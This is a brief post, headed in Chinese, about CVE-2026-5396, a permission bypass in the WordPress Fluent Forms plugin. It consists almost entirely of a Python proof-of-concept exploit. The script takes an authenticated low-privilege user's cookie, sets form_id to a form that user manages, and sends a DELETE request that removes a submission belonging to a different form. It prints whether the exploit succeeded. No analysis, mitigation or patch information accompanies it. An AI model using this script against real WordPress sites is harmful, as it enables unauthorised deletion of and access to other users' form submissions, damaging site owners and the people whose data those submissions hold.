CVE-2026-5396: Fluent Forms权限绕过漏洞

import requests # Target endpoint for managing submissions target_url = "https://example.com/wp-json/fluentform/v1/submissions" # Authenticated user cookies (User has access to form_id=1) cookies = { "wordpress_logged_in_xxx": "attacker_cookie_value" } # Vulnerability parameter: form_id # The attacker spoofs this ID to a form they manage (e.g., ID 1) # to access a submission from a different form (e.g., submission ID 999) payload = { "form_id": "1", "submission_id": "999" } # Example: Attempting to delete a submission using the bypass response = requests.delete(target_url, params=payload, cookies=cookies) if response.status_code == 200: print("[+] Exploit Successful! Submission deleted via IDOR/Bypass.") else: print(f"[-] Exploit Failed. Status Code: {response.status_code}")